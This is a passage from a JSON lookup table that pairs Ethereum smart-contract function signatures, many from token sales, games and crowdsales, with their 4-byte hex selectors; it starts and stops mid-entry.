"nextExchangeRateIndex()": "0xc42956d3", "SerpentHead()": "0x88f2b12e", "pegIsSetup()": "0x224076d4", "faucetTokenAddress()": "0x9d499363", "MaxEth()": "0xcd48578f", "bonus2Ends()": "0xef0b44db", "getLockTokenSupply()": "0xeb700331", "roundKeys()": "0xbae4f466", "getShipProductCount()": "0xba5e286b", "getNumberOfScams()": "0x2efb3f04", "resultConfirmed()": "0x9048816f", "eventCardRangeMax()": "0x4cd7699a", "is_finalized()": "0x90b30251", "tokenSoftcapIssued()": "0xcb9bdf45", "previewStageEndTime()": "0x6b2327d2", "wavesAssetId()": "0xe977a11c", "refunded()": "0x12f53950", "getGiftoAddress()": "0x81fbffe1", "periodRound()": "0x5cd03621", "weiPerDTH()": "0x2981155e", "tokenInstance()": "0x658030b3", "RATE_ETH_CUE()": "0x4973dbf6", "phaseThreeEnd()": "0x814f737d", "TOKENS_ACCOUNT_MAX()": "0x5b2b345c", "RESERVED_TOKENS_FOUNDERS()": "0x4989ae8e", "requestCnt()": "0x6ba7ffd5", "holdingTax()": "0xe7f6edbd", "callDestination()": "0x52c743d2", "openTime()": "0xb4256888", "levelTwoTokenNum()": "0xd43ea9e1", "configTimeInc()": "0x6be03bd2", "fee2()": "0x39f73a48", "disableTime()": "0x0073c769", "disbursementPeriod()": "0xe47a6a9f", "presale_eth_fund()": "0xc5b7f5bf", "maximumPoolPurchase()": "0x9b09768a", "UBETCOIN_LEDGER_TO_LEDGER_ENTRY_DOCUMENT_SHA512()": "0x95286077", "minimumPRETDEContributionInWei()": "0xe0f4a1a2", "isITOFinished()": "0x7f1ce417", "r9kAddress()": "0xc9ba0d4d", "weiCapReached()": "0x3b8e2a26", "regPrice()": "0x28a49874", "midasDepositAddress()": "0xee2ef9d9", "startRoundD()": "0x3c7818a1", "getEggsCount()": "0xa30d59c9", "FEE_SELECT_LRC()": "0xdb71d8b6", "reservationWallet()": "0x613e0fb8", "hashNext()": "0x7227c7ce", "getOwnerCars()": "0xb3d1b801", "FIRST_VOLUME_EXTRA_BONUS()": "0xf581ec95", "secondStagePriceOfTokenInWei()": "0x1daae314", "totalContributorsProfit()": "0x266fc5d5", "collectEntryFee()": "0x7af52ade", "dayPotExpiration()": "0xe95f6414", "ETH_HEROCOIN()": "0x9c9ff934", "tokenSPUsdCentPrice()": "0x9b3d17b1", "rateWaitingEnd()": "0x80e2d53b", "phoneNumber()": "0x747f3380", "leftOverTokens()": "0x55df34f2", "miningActive()": "0x12b27e3e", "totalBribery()": "0x60368a33", "dateMarketing()": "0x8db7183a", "maxSignup()": "0x00383d0a", "periodLength()": "0xd2ca2115", "incirculation()": "0x53900bdd", "currentLiquidInDeal()": "0xfc1a1110", "giveEthFundAddress()": "0x5e079aa5", "limitDateCrowdWeek2()": "0x67823a4a", "icoAllocation()": "0x4dc59196", "whitelistRequired()": "0xfb08f3a1", "maxSupplyPossible()": "0x89fe141a", "rate4()": "0x5dd8eb50", "ownerFraction()": "0x88516a89", "HIGH_RANGE_RATE()": "0xef35fc16", "priceInWeiPerSatoshi()": "0x02987db8", "STATE_INITIAL_BIDDING()": "0xd4bffa5a", "withdrawStart()": "0x35361909", "ETH_TOKEN_ADDRESS()": "0x1878d1f1", "totalContributed()": "0x023f4147", "UNSOLD_SOLD_RATIO()": "0x7f573a4f", "PARTNERS_SHARE()": "0x504c9582", "whitelistSetterAddress()": "0x1412409a", "getBlockNumberM1()": "0x8e8f39d3", "owner1()": "0x73688914", "CAT_FIRST()": "0x21f35609", "maxWin()": "0x16d190e3", "btcPriceProvider()": "0xc4b6c2f3", "brickETHPrice()": "0x1f296600", "crowdSaleMin()": "0x2e80cc56", "intrepidVouchersMinted()": "0xb105c904", "eGoldchainStart()": "0xd23ea159", "MYDECIMAL()": "0x25c48f30", "tosToken()": "0x877aaf4f", "nfsPoolCount()": "0x76e29114", "cdFee()": "0xa515aaeb", "CAT_PER_ETH_FIRST_EARLY_BIRD_RATE()": "0x4b9eb771", "icoPeriod()": "0x533425a5", "ETCHaddress()": "0xc73defce", "preSaleFirstEtherCap()": "0x13110874", "cancelCost()": "0x95f17bce", "numPayments()": "0x2279fa4c", "highEtherBonusValue()": "0x4fc4b5a0", "lastPaydayTS()": "0x6fc141da", "claimBeer()": "0xdbf1b00b", "ROBEthExchangeRate()": "0x091734e0", "stopSweepStake()": "0xecf862cc", "fiat_contract()": "0xf55523e7", "mnyLeftInCurrent()": "0x27ddbb16", "secondRoundMayTokensLimit()": "0xb8ab9203", "BONUS_TIER_9_LIMIT()": "0x8550aaf0", "saleEnabled()": "0x71b9b646", "RANGEEND_6()": "0x4e7ec7e3", "USER_BUY_LIMIT()": "0xcb78bebc", "theRichest()": "0xd660c897", "initSiriusFund()": "0x72325c5b", "getPendingReferals(address)": "0x210e9a34", "getReferedCount(address)": "0x22a4993c", "isReferee(address)": "0xa008d893", "resetReferedCount(address)": "0x432e83c5", "resetReferee(address)": "0xb9541ad5", "resetBonuses(address)": "0xa968ad0e", "checkIfReferee(address)": "0xd5f07396", "createReferee(address,address)": "0x381ae69a", "PonziUnlimited()": "0x88824bd1", "trashTokens(address,uint256)": "0x02ae832f", "retrieveTokens()": "0x600d7003", "showEthBalance()": "0x44daf94a", "showAuthorizerTwoAmount()": "0x1df8eaa2", "showAuthorizerOneAmount()": "0x602451ea", "withdrawEthereum(uint256)": "0xfba4734f", "setAuthorizedWithdrawalAmount(uint256)": "0x3741c90b", "getNoContributors()": "0x5e00e7b2", "masterTransferFrom(address,address,uint256)": "0x0dd5e582", "masterMint(address,uint256)": "0x1b96b2f9", "BioToken(address,address,address,address,address)": "0x82ec5ddc", "distributeTokens2(address[],uint256[])": "0xdde27e29", "distributeTokens()": "0x9ab1b484", "_distribution(address[],uint256[])": "0x6d788933", "evacuate()": "0x4ef05de3", "SouYingToken()": "0x0fa6e84d", "fixTokenCalcBug()": "0x0f2bc56d", "createSale(uint256)": "0x9da1b02a", "setMinimumGoal(uint256)": "0xb2561417", "setTokensPerETH(uint256)": "0x116fb2a8", "wirePurchase(address,uint256)": "0x2cc88401", "ESEVENTYSEVEN()": "0xe75bf79b", "DragonKing(address,address,uint8,uint8,uint8,uint16[],uint16[])": "0xfb2643c0", "ZestCoin()": "0x0e213129", "distributeTokens(address[])": "0x88951352", "AmountLimitCrowdsale(uint256,uint256)": "0xce6efb07", "revokeStack(bytes32,uint256,uint256,uint256,uint256,uint256)": "0x9edc7b44", "_drainGame(bytes32,address,uint256[10])": "0x51dbc419", "drainGame(bytes32,bytes32,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x9a99ebf4", "_generateRandom(bytes32,uint32,uint32)": "0x2df39546", "_getRandom(bytes32[4],uint8)": "0xcf910b37", "_generateGame(bytes32,bytes32,address,uint256[10])": "0xae5da7a0", "generateGame(bytes32,bytes32,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xbb8f712f", "onTransferStack(address,uint256,uint256,uint256,uint256,uint256,bytes32)": "0x610b16ab", "PizzaParlor(address)": "0xb2b74405", "MobilinkToken()": "0x303b8144", "BitcoinBravado()": "0x3a55f1f1", "IYMAYA()": "0x7e057b8e", "addPerson(bytes32,bytes32,uint256)": "0x773b82a3", "burnUnpaidTokens()": "0xab1b75f2", "minReached()": "0xaf6f964d", "maxReached()": "0x90135fec", "refundAll(uint256)": "0xe9fee16f", "finalizeWhenForked()": "0x98a10993", "distributeEther(uint256,uint256)": "0x7c2eb1c8", "distributeToken(uint256,uint256,bool)": "0xb579b6c5", "buy(address,uint256,uint256,uint256,bool)": "0x50fed3b4", "getBuyerNumber()": "0x408b9945", "buyDeferredPresaleTokens(address)": "0x8f4ce746", "unregisterPresale(address)": "0xe57c78ec", "registerPresale(address,uint256,uint256,bool)": "0x7ecab507", "pushBuyerList(address)": "0xa7c368c0", "RefundVault(address,address[])": "0x327e36dc", "toSCL(uint256)": "0x9f28f7c4", "SCLCrowdsale(address,address,address,uint256)": "0xc9a3f228", "ExhaustionCoin()": "0xd62a13ac", "resolveBet()": "0x8fced626", "EUFBToken()": "0x53f6ef28", "verify(uint256,uint256,string,uint8,bytes32,bytes32)": "0x928d4144", "seSigner(address)": "0xa0135d04", "setBaseUri(string)": "0xa0bcfc7f", "mint(uint256,uint256,string,uint8,bytes32,bytes32)": "0x9f535821", "recovery(address,address,uint256)": "0x0a5a00c1", "SPARCToken()": "0x3dfd83c6", "EOM()": "0x8e9206a0", "ShowCoinToken()": "0x798764ec", "Bqt_Token()": "0x3463934b", "removeWhiteList(address[])": "0x39745791", "changeMainEndTime(uint256)": "0x49b9734d", "changeMainStartTime(uint256)": "0xf4009d99", "isExistInWhiteList(address)": "0x060a1051", "setWhiteListOwner(address)": "0x91962739", "CrowdsaleMain()": "0x2cfd10a0", "cleanupErrorGame(address,uint256,uint256)": "0xbcc7db5a", "rollDie(address,uint256)": "0x14a89904", "viewMyShares(bool)": "0xe16c8d4b", "retrieveExcessEther()": "0x44c20e6f", "settleBet()": "0x8e4bf820", "Hyperion()": "0x36ea76e2", "clyckterium()": "0x770f9feb", "MamatToken(uint256,string,uint8,string)": "0x073f323d", "resetState()": "0xf9e19fa5", "closeTurnByHand(uint256)": "0x1ef2c6d1", "getLunckyIndex()": "0xe22e8046", "afterCallBack()": "0x124b0939", "componentCount()": "0x1fe26e9d", "redeemExcluded(address[],uint256[])": "0x899967b7", "partialRedeem(uint256,address[])": "0x835a749d", "WeGoldToken()": "0xdb40ed24", "ZToken(uint256,string,string)": "0x95eced5f", "GreedPit()": "0xbb6a0853", "Government()": "0x7c25f260", "goods(uint16,uint256)": "0x691bfc89", "godAutomaticCollectFee()": "0x35ae41c9", "giveRightToVote(address)": "0x9e7b8d61", "giveMeat()": "0xb5299ca6", "giveContributionsBackProfitBugged()": "0x04706fdf", "giveAllBack()": "0x0b7373d6", "GitHubBounty()": "0xfb9a4595", "getWwLength()": "0x4ae8c55f", "getWins(address)": "0xffb1a6cb", "getVotes(uint256)": "0xff981099", "GetUserRank(uint8,address)": "0x6de00927", "get_username(address)": "0xa2bb5d48", "getUserAddress(uint256,bytes32)": "0x74e4435f", "getUint(int256,bytes32,string)": "0x9bb0e4df", "getTrademark()": "0xf709dd51", "getTotalValue()": "0xcaa648b4", "getTotalSupply()": "0xc4e41b22", "getTotalBalance()": "0x12b58349", "getTOS(address)": "0xacab021c", "getTokenBalance()": "0x82b2e257", "get_timestamp(bytes32)": "0x9f0e3107", "getTicketHolders(uint256)": "0x002a5cc9", "getThresold(uint256)": "0x55b62dcf", "getThing(bytes32[])": "0xdf300b46", "getTag(string,uint256)": "0x7ac26aeb", "getSwap(uint256)": "0x4a0d89ba", "get(string)": "0x693ec85e", "getStLength()": "0x9a0af2ec", "getStatusOfPayout(uint256)": "0x22b0f6ee", "get_stake(bytes32)": "0xe9e7a667", "getSource()": "0xafa293d4", "GetSmallCotractIndex(address)": "0x842bc37b", "getSignsCount(uint256)": "0x28dcfdac", "getSignDetails(uint256,uint8)": "0xb36a0b15", "getSignData(uint256,uint8)": "0x308d6613", "getShareholderAdressByID(uint256)": "0x347632e8", "getSeedPrice()": "0x9183fd01", "getSeedCost(uint256)": "0x288c6ed2", "getSchemasLenght()": "0xd239ea8b", "getSaleDate(bytes16,uint256)": "0xac92fdb5", "getSaleDate(bytes16)": "0x85dd2148", "getRewardsCount(uint256)": "0x7332b520", "getResult(bytes32)": "0xadd4c784", "getRegistrants()": "0x052b2aa7", "getRegInfo(address)": "0xb719d1d0", "getRecordAtIndex(uint256)": "0x7bcd7fad", "getRandom(uint256)": "0xcd4b6914", "getRaceEndBlock()": "0xf1b3f968", "getQueryFee()": "0x163aba3c", "getQrLength()": "0x6a28db13", "get_publisher(bytes32)": "0x7486a8e3", "getProfitShare(address)": "0x116c6eab", "GetPrice(uint8)": "0x953aa435", "getPlayerID(address)": "0xe56556a9", "getPayment(uint256,uint256)": "0x5a825cbb", "getPaymentOf(address)": "0xe42d5be0", "GetPart(bytes32,uint256)": "0xd085e66e", "getPart(bytes32,uint256)": "0xe74ffbd5", "GetOwner()": "0x0ae50a39", "getOwnedBot(address,uint256)": "0xfaa1a8ff", "getOperation(uint256)": "0x202e3924", "getOperationsNumber()": "0x09574810", "getOperatingBudget()": "0x531c1b33", "getNumOfSalesWithSameId(bytes16)": "0xa8893a6e", "getNumInvestors()": "0x72ea4b8c", "getNumHolders(uint256)": "0x52200a13", "getNumCalled()": "0xb39a64cd", "getNum(bytes32,uint256)": "0x57ee24af", "GetNumbersFromHash(bytes32)": "0x06638e92", "getNumbersFromHash(bytes32)": "0x017972af", "getNumbersFromBytes(bytes3)": "0x5819dde2", "getNumberOfPayments(uint256)": "0x1c895915", "getNow()": "0xbbe4fd50", "getNodeAddress(bytes32)": "0x2ade6c36", "getNextSellerBOTdata(uint256)": "0xea1bf386", "getMyShares()": "0x3e83fe36", "getMyShareholderID()": "0x0645b5d5", "getMyProposals()": "0x36ffa905", "getMyPlayerID()": "0xc003b082", "getMyMsg()": "0xb484e532", "getMyBounty(uint256)": "0xcfb3a493", "getMwLength()": "0xc1d4f708", "getMsgs()": "0x50ab6f7f", "GetMoney(uint256,address)": "0x3cc86b80", "GetMoney()": "0x686e8aaa", "getMinMax()": "0xa538d287", "getMinInvestment()": "0x724ae9d0", "getMinimumGasLimit()": "0xf909d60d", "getMinimalDeposit()": "0x90daaf67", "getMinimalBalance(uint256,address)": "0x5af73f3f", "getMinBetAmount()": "0x82a5285d", "getMaxBetAmount()": "0x550ed1f0", "getLosesShare(address)": "0xe0e3ba5a", "getLOg(uint256)": "0x29a065bd", "getLastTag(uint256)": "0x89f4ed7a", "getLastPrice(uint256)": "0x65fa2f7f", "getLastNonPublished()": "0xc5bf339c", "getIssueState(uint256,bytes32)": "0x706dfe54", "DEFAULT_LOCK_COST_PER_HOUR()": "0xa71a3dde", "_phase1Supply()": "0x6c5e9e18", "iTime()": "0xe02f9027", "expirationDate()": "0x8f620487", "lastDepositDate()": "0x05a30a7a", "crowdETHTotal()": "0x59e415d3", "DEVELOPER_FEE_FRAC_BOT()": "0xe338a490", "feeWallet()": "0xf25f4b56", "BTL_PERSIAN()": "0x26cf53b9", "risedUSD()": "0x5282f649", "PROMO_TOKEN_AMOUNT()": "0xe8d59fae", "HARD_CAP_EUR()": "0x01db61e0", "weiMaxCap()": "0xf8fdebd3", "deathFactor_i()": "0xaa5b95d1", "witnesses()": "0x53176195", "PRCT100_ETH_OP()": "0x63b56431", "mrate()": "0x00f3e717", "maxETH()": "0x02814b86", "ownerWithdrawalDate()": "0xdbb633f1", "tokenSaleClosedTime()": "0xf1bbc663", "emergencyWithdrawalRatio()": "0x17c5fed8", "amountOfLovers()": "0x096c0c27", "canClaimToken()": "0xfabe1416", "TotalCrowdsaleSupply()": "0xaa85048a", "vestingManager()": "0xdb27b8dd", "numChametzForSale()": "0x70a0f1fe", "requiredTokenAddress()": "0x6f264b2e", "tokenHardCap()": "0x39688256", "GAME_TYPE_DICE()": "0x748dd2fc", "outterlockStartTime()": "0xb446e7b9", "carsCount()": "0xc3d97a27", "halt_purchases()": "0xf1317c09", "CROWD_WAVE3_BONUS()": "0xafbcd19b", "issuedByStabilityBoard()": "0x68c6f45e", "MAX_CRATES_TO_SELL()": "0x92d33200", "getBackendWallet()": "0x01ad62a3", "winningTeam()": "0xde3f18e2", "stopSendWebGift()": "0x8b6aacc8", "baseTokenGetRate()": "0x4fe50bc6", "feeCalculated()": "0xa7f2cc54", "getVault()": "0x8d928af8", "niceguy1()": "0x6388fafa", "accountLocked()": "0xdd7a1722", "currentPot()": "0x574479e6", "binary()": "0xa76044a4", "trueGods()": "0xf113fccd", "Withdraw_3()": "0x80c80611", "JACKPOT_WINNER()": "0x9c5d5e98", "pending()": "0xe20ccec3", "firstPay()": "0x2ca781f1", "TOKEN_FOURTH_PRICE_RATE()": "0xcd05c214", "btcId()": "0x3cf43e2c", "isBountyAllocated()": "0x2809c5e1", "individualMaxCapWei()": "0x3282aa8a", "REQUEST_CANCELED_BY_BORROWER_STATUS()": "0x35b1114a", "apiAccessDisabled()": "0xfeb2a20c", "fundAdvisor()": "0x163317c6", "initWallet()": "0x3e326048", "indexReplies()": "0xc37d8a7e", "buyerCount()": "0x9e0cea05", "tokenTranslate()": "0xbd9b6e85", "level_7_amount()": "0x866278a8", "amountLocked()": "0x6c6c7e05", "stage2Start()": "0xfef636a8", "numberOfWins()": "0xd85f4450", "ICOcollected()": "0x71d76096", "maxSaleToken()": "0x5923c7f9", "thinkTankFundAddress()": "0x025845ae", "ARCD_FUND_DEPOSIT()": "0x991a3b5e", "PRESALE_BONUS_PERCENT()": "0x2e867c77", "CROSAIR_VOUCHER_LIMIT()": "0xca46e41f", "standardDailyLimit()": "0xf217d6a3", "deadLine()": "0xbef3a083", "presaleMaxEtherCap()": "0x6293b5bb", "companyName()": "0xf5ec2eed", "PRICE_VARIABLE()": "0xb109e894", "secondStageTokenRate()": "0xb573a104", "maxRoundDelay()": "0x3aaf3232", "isIntermediateVault()": "0x4aa47a50", "txCounter()": "0x74f079b8", "MONTHLY_INTERNAL_VAULT_CAP()": "0x13045155", "minimumBuyAmount()": "0x8d6a2ed5", "sanMinLength()": "0xaaf49910", "cofoundersSupplyVestingTranchesIssued()": "0x464da87e", "numberOfPledgeAdmins()": "0x5503d9ba", "minJackpotBet()": "0x463959fa", "presaleWallet()": "0x1ed77dc8", "initialPrizeWeiValue()": "0x0d5e4c8d", "CurrentEntityState()": "0x7278d623", "lastPeriodStarDate()": "0xda81b09b", "descending()": "0x94c06a58", "delayHours()": "0xda4778c2", "hicsToken()": "0x59e5d4b5", "UbiqIssued()": "0xfb305569", "votePerETH()": "0x5008cfcc", "bonusFourthWeekPeriod()": "0xe20a5ac2", "gasBefore_()": "0x9d408b93", "creators_count()": "0x0c45361f", "PRESALE_WEI_WITH_BONUS()": "0x2a4a8d68", "TokensPerEther()": "0x80e2517c", "TextMessage()": "0x720c5732", "MultiSigController(address,address[],uint256)": "0x07de8e8c", "burnBalance(address)": "0x98179c41", "stopICO()": "0xc8e569a8", "setPlatformAddress(address)": "0xcc03c342", "burnedTokens()": "0x47b5dd54", "distributedTokens()": "0x586360ce", "CAP_ICO()": "0x6d8a5f8f", "Monarchy()": "0x9ac233f3", "getAddressAndSharePriceOfFunds()": "0xf2218819", "FundRanking(address)": "0xe26176d9", "redeemDeposits()": "0x4b2c89d5", "_removeDeposits(address,uint256)": "0x75b91305", "leave()": "0xd66d9e19", "getDepositAtIndex(uint256)": "0x3ed0a373", "getDepositCount()": "0x9363a141", "setMaxValidators(uint256)": "0x9bb2ea5a", "_deleteSmallestBidder()": "0x58a2982a", "_deleteValidator(address)": "0xd7e8553a", "setBaseDeposit(uint256)": "0xc22a933c", "_insertValidator(address,uint256)": "0x91b584f3", "_updateChecksum()": "0x8c864dfe", "getMinimumDeposit()": "0x035cf142", "_hasAvailability()": "0x97584b3e", "getValidatorAtIndex(uint256)": "0xe7a60a9c", "getValidatorCount()": "0x7071688a", "isValidator(address)": "0xfacd743b", "isGenesisValidator(address)": "0xcefddda9", "Election(uint256,uint256,uint256,address)": "0x36645e01", "emitTransferred(address,address,uint256,address)": "0x2e502569", "emitWithdrawn(address,uint256,address)": "0xe8203e38", "emitDeposited(address,uint256,address)": "0x6be9f7a0", "emitFeeSet(uint256,address)": "0x816ed336", "_emitTransferred(address,address,uint256,address)": "0xf2c00979", "_emitWithdrawn(address,uint256,address)": "0x3e2d6cf6", "_emitDeposited(address,uint256,address)": "0xe24b4403", "_emitFeeSet(uint256,address)": "0x00c9c8e7", "_subBalance(address,uint256,address)": "0x8984e5dd", "_addBalance(address,uint256,address)": "0x3dc23486", "getBalanceHolder()": "0xd70657ac", "getFeeAddress()": "0x4e7ceacb", "calculateFee(uint256,address)": "0x400ba069", "getBalanceOf(address,address,address)": "0x04638e1a", "getBalance(address,address,address)": "0xd6bd603c", "forwardFee(uint256,address)": "0x5e199892", "transferFromMany(address[],address,uint256[],address)": "0x9d87a373", "transferAll(address,address,uint256,address,uint256,uint256,address)": "0xd97dec19", "transferToMany(address,address[],uint256[],uint256,uint256,address)": "0x8e3ab913", "transferWithFee(address,address,uint256,uint256,uint256,address)": "0x06cf2280", "transfer(address,address,uint256,address)": "0xf9ce7813", "_withdraw(address,uint256,address)": "0x208eba04", "deposit(uint256,address)": "0x6e553f65", "getFeePercent(address)": "0xd2526418", "setFeePercent(uint256,address)": "0x3ad9a928", "setBalanceHolder(address)": "0x86b7b8f6", "withdraw(address,uint256,address)": "0x69328dec", "deposit(address,uint256,address)": "0xf45346dc", "getString2()": "0x38dfe2f5", "getString1()": "0x87330b85", "setString(string,string)": "0x6e1a1336", "getEntitlement()": "0x7b5330a7", "isEntitled(address,address)": "0xb2b4ae25", "getOrThrow(string)": "0xdc5acb90", "getIcoReward(uint256)": "0x69244c55", "checkPremium(address)": "0xc9dd915f", "buy(address,address)": "0xad7fadc5", "receiveFunds()": "0x005c33e1", "connectTokens(address,address)": "0x531571a9", "abortICO()": "0x53d3e848", "closeICO()": "0x54238645", "extendICO()": "0x33f50b1c", "setICOEthPrice(uint256)": "0x32fe5afc", "getInterest(address)": "0x7aaa3470", "checkInterest(address)": "0x83037b81", "setInterestDB(address,uint256)": "0xc959467b", "ICObonus()": "0xaa14fa5a", "ico(address,address,uint256,uint256,address[],uint256[])": "0x7ecfa8a8", "registerAadharDetails(string,string,string)": "0x3e604f48", "AaadharDemo()": "0x1fcd08f0", "getSalaryTokensTotalValue(address)": "0xd81d8f89", "getSalaryTokensTotalAddress(uint256)": "0x4d843acd", "getSalaryTokensTotalCount()": "0x263164b9", "getYearlyUSDSalariesTotal()": "0xb8b798be", "getYearlyUSDSalary(address,address)": "0x0381c260", "getLatestTokenPayday(address,address,address)": "0xe68a471d", "getLatestPayday(address,address)": "0x7e340b01", "getLatestTokenAllocation(address,address)": "0xfc52be0a", "getSalaryTokenValue(address,address,address)": "0x65995733", "getSalaryTokenAddress(address,address,uint256)": "0x75c0ae13", "getSalaryTokenCount(address,address)": "0xbb007db9", "getPeggedTokenValue(address,address,address)": "0x00ce9f8a", "getPeggedTokenAddress(address,address,uint256)": "0x4acb17c8", "getPeggedTokenCount(address,address)": "0x6b28f834", "getAllocatedTokenValue(address,address,address)": "0xa8ae3e4b", "getAllocatedTokenAddress(address,address,uint256)": "0x57d4617b", "getAllocatedTokenCount(address,address)": "0xfc608e17", "getAddress(uint256)": "0xb93f9b0a", "getId(address,address)": "0x36ef80db", "setYearlyUSDSalary(address,address,uint256)": "0xb20bf95b", "setLatestTokenPayday(address,address,address,uint256)": "0x15a6f5c1", "removeMintContract(address)": "0xc2168ecd", "addMintContract(address)": "0x00f821a7", "setMintPrice(uint256,int256,uint256,int256,uint256,int256)": "0x07f125e7", "startNextEra(bytes32)": "0x4bc4e892", "startNextEra(bytes32,uint256,int256,uint256,int256,uint256,int256)": "0xc9613733", "startNextEra_(bytes32)": "0x9efd1f0c", "makeIntString(string,uint256,string)": "0xe1421a45", "setDefaultURIEnd(string)": "0x4ab0fc08", "setDefaultURIStart(string)": "0x5bcc29d7", "updateLinkHash(uint256,bytes32)": "0xcdc5c7cd", "_transferFrom(uint256,address,uint256)": "0xfad6049b", "childApproved(address,uint256)": "0x4945a575", "rootOwnerOfChild(address,uint256)": "0xed81cdda", "rootOwnerOf(uint256)": "0x43a61a8e", "transferToParent(address,address,uint256,uint256,bytes)": "0xf50acfa0", "setPrices(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x55d374e9", "admAccount(address,bool)": "0xceaf0bfb", "CNKTToken(uint256,string,string)": "0x698a92fe", "getGen()": "0xa5ae65ba", "giveGen(uint256)": "0xa594a117", "FXSToken()": "0xd0b1b910", "TC(uint256,string,string)": "0xf8226dbf", "modifyWhitelistMulti(address[],bool[])": "0xa5891bb0", "modifyWhitelist(address,bool)": "0x060d206e", "changeHolderPercentage(uint256)": "0x66ffebb8", "TOKToken()": "0xf8115814", "getLastAttackCount(uint256)": "0x9ebafad6", "getLastAttack(uint256,uint256)": "0xbd780d0d", "setItemContract(address)": "0xa7120433", "setNinjaContract(address)": "0xea636aca", "setCastleContract(address)": "0xc42890b6", "_clearAttackLog(uint256)": "0xadc7d448", "_insertAttackLog(uint256,uint256,uint16,uint32,uint8,uint32,bool)": "0x6751ad3d", "_computeDamage(uint256,uint256,uint8)": "0x050906ea", "attack(uint256,uint256,bytes)": "0x08151de1", "addTraps(uint256,bytes,uint256[])": "0x1a918bdd", "defence(address,uint256,uint16,bytes,uint256[])": "0x4319dfd9", "buyItem(address,uint8,uint256)": "0xec8fe065", "buyCastle(address)": "0x3735ab75", "buyNinja(address)": "0xacf1e9fa", "transfer(address,address,address[],uint256[])": "0x11be40e0", "AirDropContract()": "0x93d0de98", "getAddress(address[],bool,bool)": "0x1cbea99b", "BejonesStandardToken(uint256,string,uint8,string)": "0x0b42d1de", "_assign(address,address,uint256)": "0x9fcb29fc", "confirmERC20(bytes32)": "0xfa47c564", "transferERC20(address,uint256)": "0xf7448a31", "confirmETH(bytes32)": "0x7de1a631", "changeERC20(address)": "0xd2651855", "HashProject(address)": "0x9c926061", "getBounsByAmount(uint256,uint256)": "0x137b3bcd", "getBonusByTime(uint256)": "0x68393a4c", "setSaleCap(uint256)": "0xd3d37a31", "sendForPreICO(address,uint256)": "0xc1f45e80", "setPeriod(uint256,uint256,uint256)": "0x8feadcb7", "initialize(address,address,uint256,uint256,uint256,uint256)": "0x86489ba9", "getDate()": "0x430fe9c1", "GetSaleInfo_Airdrop(uint8)": "0x5128ab7b", "GetSaleInfo_Presale(uint8)": "0x3aa36dd4", "setRefundable(bool)": "0x2d9e87c5", "setSaleType_Airdrop(uint8,uint8,uint32,uint8,int256,uint256,int256)": "0xde4d51a5", "setSaleType_Presale(uint8,uint8,uint32,uint256,uint256)": "0xee37e271", "calculateSumToWithdraw()": "0xea0d1027", "MasterToken(uint256,string,uint8,string)": "0x2e20255e", "unlock(address[])": "0xd791de63", "lock(address[])": "0x42f6208e", "CEZA(uint256,string,string)": "0xfb63e4b1", "sbtToken(address)": "0xbe1ff08b", "DeepToken()": "0xcbb433ea", "XXXXXXXX10(address)": "0x4ed7cb10", "XXXXXXXX03(uint256)": "0x64d75891", "XXXXXXXX09()": "0x5d3bb19e", "saltoken(address,address)": "0x42091e76", "XXXXXXXX05()": "0x03f4864d", "XXXXXXXX08(uint256)": "0xc6253f14", "XXXXXXXX02(address[],uint256)": "0x39eba5f9", "XXXXXXXX01(address,uint256)": "0x359d9277", "XXXXXXXX04()": "0xcd6fafa2", "XXXXXXXX07(address)": "0xd0216dce", "ShopDexToken()": "0x9b2112c7", "XXXXXXXX06(address,address,uint256)": "0x9a23ab61", "EDT2()": "0xede78573", "_checkRecommend(bool,uint256)": "0xdefe2c47", "_createRandomNumber(bytes32,uint256)": "0x178c17f0", "_gambling(uint256,bytes32,uint256)": "0xb8386f3b", "_awardForRecommender(bool,uint256,uint256)": "0xf51d0c6f", "_buyFromMarket(uint256,bool,uint256)": "0xe37e26cc", "_buyAndCreateToken(uint256,bool,uint256)": "0x295d0eb5", "_getCurrentTradableToken()": "0x8c3f71b2", "queryCurrentTradablePrice()": "0x2554a358", "queryCurrentContractFunds()": "0x63dc5400", "buy(uint256,bool,uint256)": "0x438af924", "getMyTokens()": "0x5b3b136a", "queryToken(uint256)": "0x65f63c1b", "startMining(address)": "0x53c06966", "balanceOfOwnerInVault(address,address)": "0x64392a80", "totalInVaults()": "0xcdc81bc2", "countMembers()": "0x2cd046eb", "addMemberAcct(address)": "0x1b6bc433", "removeMemberAcct(address)": "0xe2d2dcca", "dash()": "0x60e68a25", "tittyContract()": "0x234e5273", "CANCELLED_FEE_FLAG()": "0xbe0da251", "cryptogsAddress()": "0xce5c5201", "vipBrokerNum()": "0xd016ec40", "minimumDealAmount()": "0x79d9e979", "developmentAuditPromotionWallet()": "0xa51e62a1", "grantedParsecCredits()": "0xe91a08a2", "freeReferralPacksClaimed()": "0x42974b1e", "multiAccessRecipient()": "0x24f1ec37", "tokenFrozenSinceNotice()": "0x6a9d02e9", "closeOutSweeps()": "0x0a95c49d", "inflationChange()": "0xa7c83514", "DEFAULT_RATE()": "0xa3e860fe", "sumICOStage8()": "0x7fa40a42", "r0()": "0x659621b5", "raisedEthers()": "0xdad59f35", "amountToBeneficiary()": "0xd8f0b9c4", "PendingETHs()": "0x7e7894e4", "availableICO_w2()": "0x0bee1c3e", "managementContractAddress()": "0xce578cd6", "dataset_sha256checksum()": "0x997cf69c", "startEarlyStage1()": "0x6df26d14", "liquidityPoolTokens()": "0xb75fdf3a", "PRE_ICO_FINISH()": "0xa6024524", "putProfit()": "0x347b3923", "CrowdsaleEnabled()": "0x011d79ca", "bountyReserve()": "0xc1b9f177", "probability()": "0x481456f9", "ThirdAddressBalance()": "0xb016f9f2", "fundraising()": "0xa70fc680", "getTokenTransferSetCount()": "0x27d51979", "referrerBonus1()": "0x75e0747e", "isAllowedTransferDuringICO()": "0x0ca2bda2", "ICORatio()": "0xe6544b87", "maxResolvedAgonId()": "0x88753343", "winningMultiplier()": "0xcb560ac4", "MAX_MINT_NUMBER()": "0xf65d6d4f", "icoEnablersTokensMinted()": "0xb3eee638", "PatronOneWithdrawal()": "0x50d9b932", "joinDelta()": "0x74aac084", "publicAllocatingToken()": "0x4d13d134", "getStagesInfo()": "0x7dec2299", "FOR_FOUNDER()": "0x229233b6", "isICOOpened()": "0x2cc92b2b", "hodlerTotalValue9M()": "0xd43a0b4c", "CUSTOM_ERC20_CREATE_SERVICE_NAME()": "0x2372996a", "dogexSupply()": 